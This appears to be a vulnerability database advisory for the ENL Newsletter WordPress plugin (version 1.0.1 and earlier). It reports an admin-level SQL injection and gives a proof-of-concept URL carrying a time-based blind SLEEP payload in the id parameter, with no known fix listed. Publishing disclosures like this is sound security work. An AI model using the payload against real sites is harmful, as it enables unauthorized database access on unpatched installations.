WordPress Plugin Vulnerabilities

ENL Newsletter <= 1.0.1 - Admin+ SQL Injection

Description

The plugin does not sanitize and escape a parameter before using it in a SQL statement, allowing admin+ to perform SQL injection attacks

Proof of Concept

As an admin open a link like:

http://example.com/wp-admin/admin.php?page=enl-campaigns&action=campaign-run&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))nQIP)

There will be a delay indicating that the injection has succeeded.

Affects Plugins

No known fix

References

Classification

Type
SQLI
OWASP top 10
CWE

Miscellaneous

Original Researcher
Bob Matyas
Submitter
Bob Matyas
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2024-04-05 (about 1 months ago)
Added
2024-04-05 (about 1 months ago)
Last Updated
2024-04-05 (about 1 months ago)

Other